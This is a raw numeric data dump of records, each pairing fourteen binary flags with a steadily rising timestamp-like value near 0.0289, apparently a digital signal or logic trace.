0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762576e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762600e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762628e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762652e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762676e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762700e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762724e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762748e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762776e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762800e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762828e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762852e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762876e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762900e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762924e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762948e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762976e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8763000e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8763028e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8763052e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8763076e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8763100e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8763124e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8763148e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8763172e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8763196e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8763224e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8763248e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8763272e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,2.8887932e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.8888164e-02 1,1,0,1,0,0,0,0,0,0,0,1,0,1,2.8888196e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.8888220e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.8888516e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.8888544e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.8888564e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.8888588e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.8888616e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.8888640e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.8888668e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.8888692e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.8888716e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.8888740e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.8888764e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8888768e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8888788e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8888816e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8888840e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8888868e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8888892e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8888916e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8888940e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8888964e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8888988e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889016e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889040e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889068e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889092e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889116e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889140e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889164e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889188e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889212e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889236e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889264e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889292e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889316e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889340e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889364e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889388e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889412e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889436e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889464e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889488e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889516e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889540e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889564e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889588e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889612e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889636e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889664e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889688e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889716e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889740e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889764e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889788e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889812e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889836e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8889864e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8889888e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8889892e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8889916e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8889940e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8889964e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8889988e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8890012e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8890036e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8890064e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8890088e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8890116e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8890140e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8890164e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8890188e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890196e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8890212e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890236e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8890264e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890288e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8890316e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890340e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8890364e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890388e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8890412e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890436e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8890464e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890488e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8890516e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890540e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8890564e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890588e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8890612e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890636e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8890664e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890688e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8890716e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890740e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8890764e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890788e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8890812e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890836e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8890864e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890888e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8890916e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890940e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8890964e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8890988e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8891012e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8891036e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8891064e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8891088e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8891116e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8891140e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8891164e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8891188e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8891212e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8891236e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8891264e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8891288e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8891292e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8891316e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8891340e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8891364e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8891388e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8891412e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8891436e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8891464e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8891488e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8891516e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8891540e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8891564e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8891588e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8891596e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8891612e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8891636e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8891664e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8891688e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8891716e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8891736e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8891764e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8891788e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8891812e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8891836e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8891864e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8891888e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8891916e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8891936e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8891964e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8891988e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892012e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892036e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892064e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892088e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892108e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892136e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892164e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892188e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892212e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892236e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892260e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892288e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892308e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892336e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892360e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892388e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892412e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892436e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892460e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892488e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892508e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892536e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892560e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892588e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892612e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892636e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892660e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892688e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892708e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892736e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892760e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892788e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892812e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892836e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892860e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892888e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892908e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892936e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8892960e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8892988e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893012e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893036e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893060e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893088e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893108e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893136e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893164e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893196e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893220e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893244e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893268e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893292e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893316e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893344e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893368e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893396e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893420e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893444e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893468e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893492e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893516e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893544e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893568e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893596e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893620e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893644e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893668e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893692e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893716e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893744e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893768e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893796e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893820e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893844e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893868e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893892e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893916e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893944e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8893968e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8893996e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894016e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894040e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894068e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894092e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894116e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894140e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894164e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894196e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894216e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894240e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894268e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894292e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894316e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894340e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894364e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894396e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894416e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894440e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894468e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894492e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894516e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894540e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894568e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894596e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894620e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894644e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894668e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894692e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894716e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894744e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894768e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894796e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894820e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894844e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8894868e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8894892e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.9019836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.9020052e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.9020068e-02 0,0,1,1,0,0,0,0,0,0,0,1,0,1,2.9020100e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.9020124e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,2.9020452e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.9020476e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,2.9020500e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.9020524e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,2.9020548e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.9020576e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,2.9020600e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.9020628e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,2.9020652e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9020672e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9020676e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9020700e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9020724e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9020748e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9020776e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9020804e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9020828e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9020852e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9020876e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9020900e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9020924e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9020976e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021004e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021028e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021052e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021076e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021100e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021124e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021152e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021176e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021200e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021228e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021252e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021276e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021300e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021324e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021348e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021376e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021404e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021428e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021452e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021476e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021500e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021552e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021576e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021604e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021628e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021652e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021676e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021700e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021724e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021752e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021776e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021804e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021828e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021852e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021876e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021900e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021924e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021948e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9021972e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9021996e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022028e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022048e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022076e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022100e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022124e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022148e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022172e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022196e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022224e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022276e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022300e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022348e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022372e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022424e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022448e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022500e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022524e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022572e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022596e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022652e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022676e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022700e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022724e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022748e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022772e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022796e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022824e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022848e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022876e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022900e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022924e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022948e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9022972e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9022996e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023024e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023048e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023076e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023100e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023124e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023148e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023172e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023196e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023224e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023248e-02 